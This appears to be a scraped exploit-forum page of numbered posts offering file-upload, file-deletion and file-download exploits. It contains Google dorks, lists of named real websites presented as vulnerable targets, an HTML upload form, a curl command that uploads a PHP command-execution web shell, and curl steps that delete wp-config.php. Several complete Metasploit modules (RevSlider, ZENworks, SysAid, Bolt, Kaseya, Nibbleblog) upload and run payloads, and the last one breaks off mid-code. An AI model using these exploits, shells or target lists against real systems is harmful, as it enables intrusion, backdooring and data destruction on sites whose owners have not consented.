www.comune.borgo-san-lorenzo.fi.it/scrivi-al-comune-0 www.comune.bagno-a-ripoli.fi.it/scrivi-al-sindaco-0 www.comune.rignano-sullarno.fi.it/scrivi-al-comune www.comune.pontassieve.fi.it/scrivi-al-comune-0 www.comune.marradi.fi.it/scrivi-al-comune www.comune.dicomano.fi.it/scrivi-al-comune-0 www.comune.reggello.fi.it/scrivi-al-comune-0 www.comune.palazzuolo-sul-senio.fi.it/scrivi-al-comune www.comune.scarperiaesanpiero.fi.it/scrivi-al-comune www.comune.provagliodiseo.bs.it/node/19 www.comune.terni.it/scrivi-al-comune ################################################################################################ Reference Topic Link [ It belongs to me ] => cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  8. ################################################################################################# # Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 19/06/2018 # Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060226 ##################################################################################################### Description : “Jssor Slider by jssor.com” is open source software. Jssor Slider is professional, light weight and easy to use slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features. # Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins ##################################################################################################### Affected Jssor Slider Plugin Code : When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run: That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded. It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error. The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace “[path to WordPress]” with the location of WordPress. public function register_ajax_calls() { if ( isset( $_REQUEST['action'] ) ) { switch ( $_REQUEST['action'] ) { case 'add_new_slider_library' : add_action( 'admin_init', 'jssor_slider_library' ); function jssor_slider_library() { include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php'; } break; case 'upload_library' : add_action( 'admin_init', 'upload_library' ); function upload_library() { include_once JSSOR_SLIDER_PATH . '/lib/upload.php'; } break; } } } ##################################################################################################### # Google Dorks : inurl:''/wp-content/jssor-slider/jssor-uploads/'' intext:''Managed by Web development company Ethic Solutions'' intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador'' intext:''Website Developed by DRC Systems'' ##################################################################################################### # PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library # Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"} # Exploit Code : <html> <body> <form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" > <input type="file" name="file" /> <input type="submit" value="Submit" /> </form> </body> </html # Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/..... # Allowed File Extensions : With the exception of php and asp. [ Not Allowed ] But other files extensions are allowed. For example html and txt and etcetra.... # Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1] localhost/jssorsliderexploiter.html ################################################################################################# # Example All Vulnerable Sites => treeline.co/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sss2003.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library lr-parts.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library eduardobermejo.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library anro.net.pl/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library esplural.com/ecuaauto/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sardardham.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library butterbean.ph/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library canoes.fr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library betterimpact.ca/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library klshospital.co.in/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library ############################################################################ Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  9. vvvvvvvv *************************************************** # Exploit Title: Đăng nhập Arbitrary File Upload # Google Dork: intext:Đăng nhập. Xác nhận. inurl:/xadmin # Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php # Date: 12/10/2018 # Author: 0N3R1D3R # Team: Indonesia To World Team # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Exploit the site with /editor/fileman/aklsdjfklsdjflksdkl.html [+] Upload your backdoor with bypass ext *************************************************** [+] Demo Site [+] https://thietbibepkanzler.vn/editor/fileman/aklsdjfklsdjflksdkl.html [+] http://kientrucla.com/editor/fileman/aklsdjfklsdjflksdkl.html [+] https://www.songhonghanoi.com/editor/fileman/aklsdjfklsdjflksdkl.html *************************************************** Thanks To Indonesia To World Team
  10. Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2018-10-09 CVE-ID:[CVE-none] Download Site: https://github.com/blueimp/jQuery-File-Upload/releases Vendor: https://github.com/blueimp Vendor Notified: 2018-10-09 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=204 Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads. Vulnerability: The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution. This has been actively exploited in the wild for over a year. Exploit Code: $ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php Where shell.php is: <?php $cmd=$_GET['cmd']; system($cmd);?>
  11. *************************************************** # Exploit Title: Dipnot Yönetim Paneli Arbitrary File Upload # Google Dork: inurl:/dipnotpanel/js/tinymce/plugins/fileman # Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php # Date: 03/10/2018 # Author: 0N3R1D3R # Team: Indonesia To World Team # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Exploit the site with /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] Upload your file with csrf, post file files[] [+] Upload shell must with bypass ext [+] Access the site with /dipnotpanel/js/tinymce/plugins/fileman/Uploads/file.jpg *************************************************** [+] Demo Site [+] http://www.mikronmadencilik.com/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] http://www.arinna.com.tr/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] http://www.aegee-eskisehir.org/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php *************************************************** Thanks To Indonesia To World Team
  12. # Exploit Title: Wordpress 4.9.6 Arbitrary File Deletion Vulnerability # Google Dork: N/A # Date: 2018-09-3 # Exploit Author: Rednofozi # Vendor Homepage: http://www.wordpress.org # Software Link:http://www.wordpress.org/download # Affected Version: 4.9.6 # Tested on: php7 mysql5 # CVE : N/A # Proof Of Concept ************************************************************************** Step 1: ``` curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ``` Step 2: ``` curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' ``` ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2000
  13. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end
  14. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Novell ZENworks Configuration Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in the UploadServlet which accepts unauthenticated file uploads and does not check the "uid" parameter for directory traversal characters. This allows an attacker to write anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a Metasploit exploit, but it abuses a different parameter of the same servlet. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0779'], ['OSVDB', '120382'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2015')) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_war_and_exec(tomcat_path) app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'uid' => tomcat_path, 'filename' => "#{app_base}.war" } }) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else print_error("#{peer} - Failed to upload, try again with a different path?") return false end 10.times do Rex.sleep(2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Failure. Unexpected answer break if res.code != 200 # Unless session... keep looping return true if session_created? end false end def exploit tomcat_paths = [] if datastore['TOMCAT_PATH'] tomcat_paths << datastore['TOMCAT_PATH'] end tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) tomcat_paths.each do |tomcat_path| break if upload_war_and_exec(tomcat_path) end end end
  15. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => "SysAid Help Desk 'rdslogs' Arbitrary File Upload", 'Description' => %q{ This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated file uploads and handles zip file contents in a insecure way. By combining both weaknesses, a remote attacker can accomplish remote code execution. Note that this will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection against null byte injection in file names. This module has been tested successfully on version v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability from being exploited. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-2995' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => false, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 3 2015')) register_options( [ Opt::RPORT(8080), OptInt.new('SLEEP', [true, 'Seconds to sleep while we wait for WAR deployment', 15]), OptString.new('TARGETURI', [true, 'Base path to the SysAid application', '/sysaid/']) ], self.class) end def check servlet_path = 'rdslogs' bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'vars_get' => { 'rdsName' => bogus_file } }) if res && res.code == 200 return Exploit::CheckCode::Detected end end def exploit app_base = rand_text_alphanumeric(4 + rand(32 - 4)) tomcat_path = '../../../../' servlet_path = 'rdslogs' # We need to create the upload directories before our first attempt to upload the WAR. print_status("#{peer} - Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), 'ctype' => 'application/xml', 'vars_get' => { 'rdsName' => bogus_file } }) war_payload = payload.encoded_war({ :app_name => app_base }).to_s # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail print_status("#{peer} - Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(war_payload), 'ctype' => 'application/octet-stream', 'vars_get' => { 'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00" } }) # The server either returns a 200 OK when the upload is successful. if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment") register_files_for_cleanup("tomcat/webapps/#{app_base}.war") else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end
  16. ############################################ # Title : TI Online Examination System v2 - Arbitrary File Download # Author :Rednofozi # category : webapps # Tested On : Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :https://codecanyon.net/item/ti-online-examination-system-v2/11248904 # Google Dork: inurl:N/A # Description : The "Export" operation in the admin panel is vulnerable. The attacker can download and read all files known by the name via "download.php" ############################################ # search google Dork : N/A ####################Proof of Concept ############# Demo : server/admin/ # Vuln file : /admin/download.php 115. $data_action = $_REQUEST['action']; 116. if($data_action == 'downloadfile') 117. { 118. $file = $_REQUEST['file']; 119. $name = $file; 120. $result = output_file($file, $name); # PoC : http://server/admin/download.php?action=downloadfile&file=[filename] you can write the known file name instead of [filename]. For Example: 'download.php' or 'index.php' ###################### # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1987
  17. ## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'CMS Bolt File Upload Vulnerability', 'Description' => %q{ Bolt CMS contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 2.2.4. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tim Coen', # Vulnerability Disclosure 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module ], 'References' => [ ['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html'] ], 'DisclosureDate' => 'Aug 17 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Bolt 2.2.4', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']), OptString.new('USERNAME', [true, 'The username to authenticate with']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ], self.class) end def check cookie = bolt_login(username, password) return Exploit::CheckCode::Detected unless cookie res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'bolt'), 'cookie' => cookie ) if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS') return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def fname datastore['FOLDERNAME'] end def bolt_login(user, pass) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'bolt', 'login') ) fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies vprint_status("#{peer} - Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'bolt', 'login'), 'cookie' => session_cookie, 'vars_post' => { 'username' => user, 'password' => pass, 'action' => 'login' } ) return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt') nil end def get_token(cookie, fname) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname), 'cookie' => cookie ) if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" / return Regexp.last_match[1] end nil end def rename_payload(cookie, payload, fname) res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'async', 'renamefile'), 'vars_post' => { 'namespace' => 'theme', 'parent' => fname, 'oldname' => "#{payload}.png", 'newname' => "#{payload}.php" }, 'cookie' => cookie ) return true if res && res.code == 200 && res.body.include?('1') nil end def exploit vprint_status("#{peer} - Authenticating using #{username}:#{password}") cookie = bolt_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? vprint_good("#{peer} - Authenticated with Bolt.") token = get_token(cookie, fname) fail_with(Failure::Unknown, 'No token found.') if token.nil? vprint_good("#{peer} - Token \"#{token}\" found.") vprint_status("#{peer} - Preparing payload...") payload_name = Rex::Text.rand_text_alpha_lower(10) data = Rex::MIME::Message.new data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"") data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"') post_data = data.to_s vprint_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'cookie' => cookie ) fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302 vprint_good("#{peer} - Uploaded the payload.") rename = rename_payload(cookie, payload_name, fname) fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil? php_file_name = "#{payload_name}.php" payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name) vprint_status("#{peer} - Parsed response.") register_files_for_cleanup(php_file_name) vprint_status("#{peer} - Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' ) end end
  18. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Kaseya VSA uploader.aspx Arbitrary File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary directory leading to arbitrary code execution with IUSR privileges. This module has been tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-6922'], ['ZDI', '15-449'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'], ['URL', 'http://seclists.org/bugtraq/2015/Sep/132'] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => false, 'Targets' => [ [ 'Kaseya VSA v7 to v9.1', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 23 2015')) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('ConfigTab','uploader.aspx') }) if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown end end def upload_file(payload, path, filename, session_id) print_status("#{peer} - Uploading payload to #{path}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('ConfigTab', 'uploader.aspx'), 'vars_get' => { 'PathData' => path, 'qqfile' => filename }, 'data' => payload, 'ctype' => 'application/octet-stream', 'cookie' => 'sessionId=' + session_id }) if res && res.code == 200 && res.body && res.body.to_s.include?('"success": "true"') return true else return false end end def exploit res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('ConfigTab','uploader.aspx') }) if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/ session_id = $1 else fail_with(Failure::NoAccess, "#{peer} - Failed to create a valid session") end asp_name = "#{rand_text_alpha_lower(8)}.asp" exe = generate_payload_exe payload = Msf::Util::EXE.to_exe_asp(exe).to_s paths = [ # We have to guess the path, so just try the most common directories 'C:\\Kaseya\\WebPages\\', 'C:\\Program Files\\Kaseya\\WebPages\\', 'C:\\Program Files (x86)\\Kaseya\\WebPages\\', 'D:\\Kaseya\\WebPages\\', 'D:\\Program Files\\Kaseya\\WebPages\\', 'D:\\Program Files (x86)\\Kaseya\\WebPages\\', 'E:\\Kaseya\\WebPages\\', 'E:\\Program Files\\Kaseya\\WebPages\\', 'E:\\Program Files (x86)\\Kaseya\\WebPages\\', ] paths.each do |path| if upload_file(payload, path, asp_name, session_id) register_files_for_cleanup(path + asp_name) print_status("#{peer} - Executing payload #{asp_name}") send_request_cgi({ 'uri' => normalize_uri(asp_name), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end end
  19. require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'Nibbleblog File Upload Vulnerability', 'Description' => %q{ Nibbleblog contains a flaw that allows a authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name? 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module ], 'References' => [ ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html'] ], 'DisclosureDate' => 'Sep 01 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Nibbleblog 4.0.3', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), OptString.new('USERNAME', [true, 'The username to authenticate with']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ], self.class) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def check cookie = do_login(username, password) return Exploit::CheckCode::Detected unless cookie res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin.php'), 'cookie' => cookie, 'vars_get' => { 'controller' => 'settings', 'action' => 'general' } ) if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"') return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end def do_login(user, pass) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin.php') ) fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies vprint_status("#{peer} - Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin.php'), 'cookie' => session_cookie, 'vars_post' => { 'username' => user, 'password' => pass } ) return session_cookie if res && res.code == 302 && res.headers['Location'] nil end def exploit unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check) print_error("Target does not appear to be vulnerable.") return end vprint_status("#{peer} - Authenticating using #{username}:#{password}") cookie = do_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? vprint_good("#{peer} - Authenticated with Nibbleblog.") vprint_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php" data = Rex::MIME::Message.new data.add_part('my_image', nil, nil, 'form-data; name="plugin"') data.add_part('My image', nil, nil, 'form-data; name="title"') data.add_part('4', nil, nil, 'form-data; name="position"') data.add_part('', nil, nil, 'form-data; name="caption"') data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"") data.add_part('1', nil, nil, 'form-data; name="image_resize"') data.add_part('230', nil, nil, 'form-data; name="image_width"') data.add_part('200', nil, nil, 'form-data; name="image_height"') data.add_part('auto', nil, nil, 'form-data; name="image_option"') post_data = data.to_s vprint_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'admin.php'), 'vars_get' => { 'controller' => 'plugins', 'action' => 'config', 'plugin' => 'my_image' }, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'cookie' => cookie ) if res 